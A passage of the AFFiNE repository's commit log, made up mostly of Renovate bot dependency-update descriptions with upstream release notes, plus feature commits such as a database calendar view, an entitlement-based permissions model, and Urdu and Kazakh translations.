    placeholder icon; readonly display remains unchanged.
* **Tests**
  * Updated tests to cover the new setting and toggle behavior.
* **Localization**
  * Added translations and updated i18n typings and completeness metrics.

2026-05-20 22:20:12 +08:00
renovate[bot] 41145961f9 chore: bump up RevenueCat/purchases-ios-spm version to from: "5.73.0" (#15008)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.66.0"` → `from: "5.73.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.73.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5730)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.72.0...5.73.0)

#### 5.73.0

###
[`v5.72.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5720)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.71.0...5.72.0)

#### 5.72.0

###
[`v5.71.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5710)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.70.0...5.71.0)

#### 5.71.0

###
[`v5.70.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5700)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.69.0...5.70.0)

#### 5.70.0

###
[`v5.69.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5690)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.68.0...5.69.0)

#### 5.69.0

###
[`v5.68.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5680)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.2...5.68.0)

#### 5.68.0

###
[`v5.67.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5672)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.1...5.67.2)

#### 5.67.2

###
[`v5.67.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5671)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.0...5.67.1)

#### 5.67.1

###
[`v5.67.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5670)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.66.0...5.67.0)

#### 5.67.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-20 18:41:32 +08:00
DarkSky 1f2119e273 fix: migration timeout 2026-05-20 18:39:08 +08:00
renovate[bot] 6e97aff7ba chore: bump up oxlint-tsgolint version to ^0.23.0 (#15007)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint-tsgolint](https://redirect.github.com/oxc-project/tsgolint) | [`^0.19.0` → `^0.23.0`](https://renovatebot.com/diffs/npm/oxlint-tsgolint/0.19.0/0.23.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint-tsgolint/0.23.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint-tsgolint/0.19.0/0.23.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/tsgolint (oxlint-tsgolint)</summary>

###
[`v0.23.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.23.0)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.22.1...v0.23.0)

#### What's Changed

- chore(deps): update crate-ci/typos action to v1.45.2 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#915](https://redirect.github.com/oxc-project/tsgolint/pull/915)
- feat: add skill for upgrading typescript-go by
[@camc314](https://redirect.github.com/camc314) in
[#918](https://redirect.github.com/oxc-project/tsgolint/pull/918)
- chore(deps): update pnpm to v10.33.2 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#921](https://redirect.github.com/oxc-project/tsgolint/pull/921)
- chore: update typescript-go submodule by
[@camc314](https://redirect.github.com/camc314) in
[#922](https://redirect.github.com/oxc-project/tsgolint/pull/922)
- fix: attach tsconfig path to diagnostics by
[@camc314](https://redirect.github.com/camc314) in
[#923](https://redirect.github.com/oxc-project/tsgolint/pull/923)
- fix(prefer-nullish-coalescing): parenthesize mixed logical fixes by
[@camc314](https://redirect.github.com/camc314) in
[#924](https://redirect.github.com/oxc-project/tsgolint/pull/924)
- tests(return-await): cover non-async arrow functions by
[@camc314](https://redirect.github.com/camc314) in
[#926](https://redirect.github.com/oxc-project/tsgolint/pull/926)
- chore(deps): update github.com/go-json-experiment/json digest to
[`b6187a3`](https://redirect.github.com/oxc-project/tsgolint/commit/b6187a3)
by [@renovate](https://redirect.github.com/renovate)\[bot] in
[#927](https://redirect.github.com/oxc-project/tsgolint/pull/927)
- chore(deps): update github actions by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#928](https://redirect.github.com/oxc-project/tsgolint/pull/928)
- chore(deps): update crate-ci/typos action to v1.46.0 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#929](https://redirect.github.com/oxc-project/tsgolint/pull/929)
- chore(deps): update module github.com/dlclark/regexp2 to v2 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#930](https://redirect.github.com/oxc-project/tsgolint/pull/930)
- chore: update typescript-go submodule by
[@camc314](https://redirect.github.com/camc314) in
[#931](https://redirect.github.com/oxc-project/tsgolint/pull/931)
- chore(deps): update typescript-go digest to
[`48e2953`](https://redirect.github.com/oxc-project/tsgolint/commit/48e2953)
by [@renovate](https://redirect.github.com/renovate)\[bot] in
[#933](https://redirect.github.com/oxc-project/tsgolint/pull/933)
- chore(deps): update typescript-go digest to
[`5eb880f`](https://redirect.github.com/oxc-project/tsgolint/commit/5eb880f)
by [@renovate](https://redirect.github.com/renovate)\[bot] in
[#936](https://redirect.github.com/oxc-project/tsgolint/pull/936)
- fix(no-misused-promises): handle empty JSX attributes by
[@camc314](https://redirect.github.com/camc314) in
[#938](https://redirect.github.com/oxc-project/tsgolint/pull/938)
- fix(no-unsafe-enum-comparison): flag string literal unions by
[@camc314](https://redirect.github.com/camc314) in
[#937](https://redirect.github.com/oxc-project/tsgolint/pull/937)
- chore(deps): update typescript-go digest to
[`e1f8f97`](https://redirect.github.com/oxc-project/tsgolint/commit/e1f8f97)
by [@renovate](https://redirect.github.com/renovate)\[bot] in
[#939](https://redirect.github.com/oxc-project/tsgolint/pull/939)
- chore(deps): update typescript-go digest to
[`092b34f`](https://redirect.github.com/oxc-project/tsgolint/commit/092b34f)
by [@renovate](https://redirect.github.com/renovate)\[bot] in
[#940](https://redirect.github.com/oxc-project/tsgolint/pull/940)
- chore: configure typescript-go renovate schedule by
[@camc314](https://redirect.github.com/camc314) in
[#941](https://redirect.github.com/oxc-project/tsgolint/pull/941)
- chore(deps): update github actions by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#945](https://redirect.github.com/oxc-project/tsgolint/pull/945)
- chore(deps): update dependency dprint-typescript to v0.96.0 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#947](https://redirect.github.com/oxc-project/tsgolint/pull/947)
- chore(deps): update gomod by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#946](https://redirect.github.com/oxc-project/tsgolint/pull/946)
- chore(deps): update crate-ci/typos action to v1.46.1 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#948](https://redirect.github.com/oxc-project/tsgolint/pull/948)
- fix(prefer-nullish-coalescing): emit suggestion over fix by
[@camc314](https://redirect.github.com/camc314) in
[#951](https://redirect.github.com/oxc-project/tsgolint/pull/951)
- chore: update packageManager to pnpm 11.0.4 by
[@Boshen](https://redirect.github.com/Boshen) in
[#953](https://redirect.github.com/oxc-project/tsgolint/pull/953)
- chore: update typescript-go submodule by
[@camc314](https://redirect.github.com/camc314) in
[#955](https://redirect.github.com/oxc-project/tsgolint/pull/955)
- fix(no-nullable-type-assertion-style): use suggestion instead of fix
by [@camc314](https://redirect.github.com/camc314) in
[#956](https://redirect.github.com/oxc-project/tsgolint/pull/956)
- docs: Update Go version requirement to 1.26 in CONTRIBUTING.md. by
[@connorshea](https://redirect.github.com/connorshea) in
[#957](https://redirect.github.com/oxc-project/tsgolint/pull/957)
- fix: allow safe promise intersection members by
[@camc314](https://redirect.github.com/camc314) in
[#959](https://redirect.github.com/oxc-project/tsgolint/pull/959)
- ci: switch security workflow to ubuntu-latest by
[@Boshen](https://redirect.github.com/Boshen) in
[#962](https://redirect.github.com/oxc-project/tsgolint/pull/962)
- chore(deps): update dependency vitest to v4.1.6 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#963](https://redirect.github.com/oxc-project/tsgolint/pull/963)
- chore(deps): update module github.com/dlclark/regexp2/v2 to v2.0.3 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#964](https://redirect.github.com/oxc-project/tsgolint/pull/964)
- chore(deps): update dependency dprint-markdown to v0.22.0 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#965](https://redirect.github.com/oxc-project/tsgolint/pull/965)
- chore(deps): update github actions by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#966](https://redirect.github.com/oxc-project/tsgolint/pull/966)
- perf(no-unnecessary-type-parameters): stop counting settled candidates
by [@camc314](https://redirect.github.com/camc314) in
[#967](https://redirect.github.com/oxc-project/tsgolint/pull/967)
- chore: add `dprint` to pnpm `allowBuilds` by
[@camc314](https://redirect.github.com/camc314) in
[#968](https://redirect.github.com/oxc-project/tsgolint/pull/968)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.22.1...v0.23.0>

###
[`v0.22.1`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.22.1)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.22.0...v0.22.1)

#### What's Changed

- fix: clarify `AGENTS.md` submodule guidance by
[@camc314](https://redirect.github.com/camc314) in
[#909](https://redirect.github.com/oxc-project/tsgolint/pull/909)
- feat(no-unsafe-enum-comparison): implement suggestion by
[@camc314](https://redirect.github.com/camc314) in
[#910](https://redirect.github.com/oxc-project/tsgolint/pull/910)
- feat(no-unnecessary-template-expression): implement fix by
[@camc314](https://redirect.github.com/camc314) in
[#911](https://redirect.github.com/oxc-project/tsgolint/pull/911)
- chore(deps): update dependency vitest to v4.1.5 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#912](https://redirect.github.com/oxc-project/tsgolint/pull/912)
- chore(deps): update github-actions by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#913](https://redirect.github.com/oxc-project/tsgolint/pull/913)
- fix(prefer-optional-chain): avoid access comparison false positive by
[@camc314](https://redirect.github.com/camc314) in
[#914](https://redirect.github.com/oxc-project/tsgolint/pull/914)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.22.0...v0.22.1>

###
[`v0.22.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.22.0)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.21.1...v0.22.0)

#### What's Changed

- chore: convert renovate config to json by
[@Boshen](https://redirect.github.com/Boshen) in
[#893](https://redirect.github.com/oxc-project/tsgolint/pull/893)
- chore: update typescript-go submodule by
[@camc314](https://redirect.github.com/camc314) in
[#895](https://redirect.github.com/oxc-project/tsgolint/pull/895)
- ci: replace OXC\_BOT\_PAT with GitHub App tokens by
[@Boshen](https://redirect.github.com/Boshen) in
[#894](https://redirect.github.com/oxc-project/tsgolint/pull/894)
- ci: add security analysis workflow by
[@Boshen](https://redirect.github.com/Boshen) in
[#898](https://redirect.github.com/oxc-project/tsgolint/pull/898)
- chore(deps): update github-actions by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#899](https://redirect.github.com/oxc-project/tsgolint/pull/899)
- chore(deps): update module github.com/dlclark/regexp2 to v1.12.0 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#900](https://redirect.github.com/oxc-project/tsgolint/pull/900)
- chore(deps): update dependency typescript to v6.0.3 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#901](https://redirect.github.com/oxc-project/tsgolint/pull/901)
- ci: make security analysis required-check friendly by
[@Boshen](https://redirect.github.com/Boshen) in
[#902](https://redirect.github.com/oxc-project/tsgolint/pull/902)
- feat(require-await): implement suggestions by
[@younggglcy](https://redirect.github.com/younggglcy) in
[#896](https://redirect.github.com/oxc-project/tsgolint/pull/896)
- fix: add warning for unsupported tsgolint CLI entrypoint by
[@camc314](https://redirect.github.com/camc314) in
[#903](https://redirect.github.com/oxc-project/tsgolint/pull/903)
- fix: resolve ancestor tsconfig for excluded nearest config by
[@camc314](https://redirect.github.com/camc314) in
[#904](https://redirect.github.com/oxc-project/tsgolint/pull/904)
- chore: update typescript-go submodule by
[@camc314](https://redirect.github.com/camc314) in
[#905](https://redirect.github.com/oxc-project/tsgolint/pull/905)
- fix: handle UTF-16 diagnostics by
[@camc314](https://redirect.github.com/camc314) in
[#906](https://redirect.github.com/oxc-project/tsgolint/pull/906)
- fix(no-useless-default-assignment): make default assignment removal a
suggestion by [@camc314](https://redirect.github.com/camc314) in
[#907](https://redirect.github.com/oxc-project/tsgolint/pull/907)
- fix(no-unnecessary-type-arguments): preserve shadowed type arguments
by [@camc314](https://redirect.github.com/camc314) in
[#908](https://redirect.github.com/oxc-project/tsgolint/pull/908)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.21.1...v0.22.0>

###
[`v0.21.1`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.21.1)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.21.0...v0.21.1)

##### What's Changed

- fix(no-unnecessary-condition): handle null overlap in narrowed generic
intersections by [@camc314](https://redirect.github.com/camc314)
in
[#891](https://redirect.github.com/oxc-project/tsgolint/pull/891)
- revert(no-unnecessary-type-arguments): drop inference reporting by
[@camc314](https://redirect.github.com/camc314) in
[#892](https://redirect.github.com/oxc-project/tsgolint/pull/892)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.21.0...v0.21.1>

###
[`v0.21.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.21.0)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.20.0...v0.21.0)

##### What's Changed

- chore: migrate gen-json-schemas to TS by
[@camc314](https://redirect.github.com/camc314) in
[#874](https://redirect.github.com/oxc-project/tsgolint/pull/874)
- chore: update typescript-go submodule by
[@camc314](https://redirect.github.com/camc314) in
[#879](https://redirect.github.com/oxc-project/tsgolint/pull/879)
- chore(deps): update github-actions by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#883](https://redirect.github.com/oxc-project/tsgolint/pull/883)
- chore(deps): update gomod by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#884](https://redirect.github.com/oxc-project/tsgolint/pull/884)
- chore(deps): update npm packages by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#885](https://redirect.github.com/oxc-project/tsgolint/pull/885)
- feat: improve `consistent-type-exports` diagnostics quality by
[@camchenry](https://redirect.github.com/camchenry) in
[#880](https://redirect.github.com/oxc-project/tsgolint/pull/880)
- chore(deps): update softprops/action-gh-release action to v3 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#886](https://redirect.github.com/oxc-project/tsgolint/pull/886)
- feat: enrich the `no-array-delete` diagnostic by
[@camchenry](https://redirect.github.com/camchenry) in
[#881](https://redirect.github.com/oxc-project/tsgolint/pull/881)
- feat: enrich `no-duplicate-type-constituents` diagnostic by
[@camchenry](https://redirect.github.com/camchenry) in
[#882](https://redirect.github.com/oxc-project/tsgolint/pull/882)
- fix(no-meaningless-void-operator): align with typescript-eslint union
handling by [@camc314](https://redirect.github.com/camc314) in
[#887](https://redirect.github.com/oxc-project/tsgolint/pull/887)
- chore(deps): update crate-ci/typos action to v1.45.1 by
[@renovate](https://redirect.github.com/renovate)\[bot] in
[#888](https://redirect.github.com/oxc-project/tsgolint/pull/888)
- fix(no-deprecated): avoid false positive on array destructuring
bindings by [@camc314](https://redirect.github.com/camc314) in
[#890](https://redirect.github.com/oxc-project/tsgolint/pull/890)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.20.0...v0.21.0>

### [`v0.20.0`]()

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.19.0...v0.20.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-20 13:17:46 +08:00
renovate[bot] 276b0db625 chore: bump up eslint-plugin-oxlint version to v1.66.0 (#15006)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.64.0` → `1.66.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.64.0/1.66.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.66.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.64.0/1.66.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.66.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.66.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.65.0...v1.66.0)

*No significant changes*

##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.65.0...v1.66.0)

###
[`v1.65.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.65.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.64.0...v1.65.0)

*No significant changes*

##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.64.0...v1.65.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-20 10:26:38 +08:00
renovate[bot] bac346f304 chore: bump up nestjs to v13.4.1 (#15002) 2026-05-20 05:51:24 +08:00
DarkSky 9f33d37add feat(core): integrate realtime features (#15003) 2026-05-20 05:48:03 +08:00
renovate[bot] 3e42bbf4fa chore: bump up apple/swift-collections version to from: "1.5.1" (#15001)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | patch | `from: "1.5.0"` → `from: "1.5.1"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.5.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.1):
Swift Collections 1.5.1

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.5.0...1.5.1)

This is a patch release resolving three issues uncovered since 1.5.0 was
tagged, including a source breaking regression introduced in 1.4.0,
affecting clients importing the `Collections` module.

#### What's Changed

- Import error from `HashTreeCollections`, reported by
[@vanvoorden](https://redirect.github.com/vanvoorden) in
[#653](https://redirect.github.com/apple/swift-collections/issues/653)
- Resolve source break in the Collections module by
[@lorentey](https://redirect.github.com/lorentey) in
[#654](https://redirect.github.com/apple/swift-collections/pull/654)
- Linker error around RigidArray when using in Embedded Swift for
WebAssembly, reported by
[@sliemeobn](https://redirect.github.com/sliemeobn) in
[#648](https://redirect.github.com/apple/swift-collections/issues/648)
- \[BasicContainers] Don’t define LLDB formatter symbol on Wasm by
[@lorentey](https://redirect.github.com/lorentey) in
[#650](https://redirect.github.com/apple/swift-collections/pull/650)
- Guard `UniqueBox.borrow` correctly by
[@FranzBusch](https://redirect.github.com/FranzBusch) in
[#649](https://redirect.github.com/apple/swift-collections/pull/649)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.5.0...1.5.1>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-19 23:58:03 +08:00
renovate[bot] b5e5f0708a chore: bump up Lakr233/MarkdownView version to from: "3.9.1" (#14861)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView) | minor | `from: "3.8.2"` → `from: "3.9.1"` |

---

### Release Notes

<details>
<summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary>

###
[`v3.9.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1)

###
[`v3.9.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-19 22:52:20 +08:00
Abdul Rehman f96bf3dd24 feat(i18n): expand Urdu translation (#14995)
Closes #14994
🇵🇰 Urdu Translation for Pakistani Users
## Summary

`ur.json` previously had only 31 of 2404 keys translated (~1%), leaving
most of the AFFiNE UI in English for Urdu-speaking users. This PR fills
in the remaining ~2400 keys so Pakistani / Urdu users get a fully
localized experience.

- `packages/frontend/i18n/src/resources/ur.json` — expanded from 31 →
2404 keys
- `packages/frontend/i18n/src/i18n-completenesses.json` — `ur: 2` → `ur:
100`

Existing hand-translated keys were preserved.

## Test plan

- [x] Switch app language to Urdu (اردو) in Settings → Appearance →
Language
- [x] Sidebar, top bar, calendar, doc list, settings panels all render
in Urdu
- [x] RTL layout flows correctly
- [x] Prettier + lint clean

## Summary by CodeRabbit

* **Localization**
* Urdu language support is now fully available across the application,
including translated UI text and locale-specific content.
* Users can select Urdu as their preferred language and experience
consistent translations and messaging throughout the product.

2026-05-19 22:49:22 +08:00
DarkSky c53457691d feat(server): entitlement based model (#14996)
#### PR Dependency Tree


* **PR #14996** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
  * Admin mutations to grant/revoke commercial entitlements.
  * New Doc comment-update permission.
  * Realtime user/workspace quota-state endpoints and live-update rooms.

* **Bug Fixes**
  * More accurate readable-doc filtering and permission evaluation.

* **Refactor**
* Workspace feature management moved to entitlement-based model;
permission and quota pipelines redesigned.
  * Admin workspace UI now edits flags only (feature toggles removed).

* **Tests**
* Extensive new and updated tests for permissions, entitlements, quota,
projection, and backfills.

2026-05-19 22:48:05 +08:00
Azamat Jauysh 103ad2a810 feat(i18n): add Kazakh translation (#14981)
Closes #14975

## Summary by CodeRabbit

* **New Features**
* Kazakh (kk) language has been added — users can now choose Kazakh for
the interface, with complete localization coverage and language metadata
(name and flag) included.

2026-05-18 16:45:36 +08:00
DarkSky ef4939009f feat(editor): handle calendar view overflow in edgeless mode (#14992)
#### PR Dependency Tree


* **PR #14992** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
* Calendar view now supports horizontal scrolling for better navigation.

* **Bug Fixes**
* Improved mouse wheel interaction handling to prevent unintended
scrolling.

* **Style**
* Calendar layout is now more responsive and adapts better to different
screen sizes.

2026-05-18 09:32:02 +08:00
DarkSky 0f5778ac89 feat(editor): calendar view for database block (#14984)
fix #13663


#### PR Dependency Tree


* **PR #14984** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
* Calendar view for database blocks (month layout, entry cards,
external-source support)
  * Workspace calendar integration and new slash-menu "Calendar View"

* **Improvements**
* Create/manage database rows from calendar UI; preserve durations when
moving/resizing ranges
* Drag-and-drop, drop-preview, and hit-testing support for calendar and
docs
  * Redesigned in-menu View settings with multi-page navigation
  * Context-menu input autofocus toggle and conditional back-navigation

* **Tests**
* New unit and E2E suites covering calendar layout, interactions,
sources, and slash-menu integration
2026-05-17 20:40:36 +08:00
DarkSky e9ef3c50c8 fix(editor): transcript note will create useless docs (#14976)
fix #13520


#### PR Dependency Tree


* **PR #14976** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Tests**
* Added comprehensive test coverage for markdown insertion functionality
to verify that existing document metadata remains unchanged when
importing markdown content into workspace documents.

* **Chores**
* Optimized internal markdown-to-snapshot conversion process to use a
more direct and efficient conversion approach.

2026-05-15 20:18:22 +08:00
renovate[bot] 661d5d3831 chore: bump up eslint-plugin-oxlint version to v1.64.0 (#14972)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.60.0` → `1.64.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.60.0/1.64.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.64.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.60.0/1.64.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.64.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.64.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.63.0...v1.64.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.63.0...v1.64.0)

###
[`v1.63.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.63.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.62.0...v1.63.0)

#####    🐞 Bug Fixes

- Ignore
[@typescript-eslint/consistent-type-imports](https://redirect.github.com/typescript-eslint/consistent-type-imports)
for vue, astro, and svelte files  -  by
[@Sysix](https://redirect.github.com/Sysix) in
[#710](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/issues/710)
[<samp>(e9eb2)</samp>](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/commit/e9eb236)

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.62.0...v1.63.0)

###
[`v1.62.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.62.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.61.0...v1.62.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.61.0...v1.62.0)

###
[`v1.61.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.61.0)

[Compare
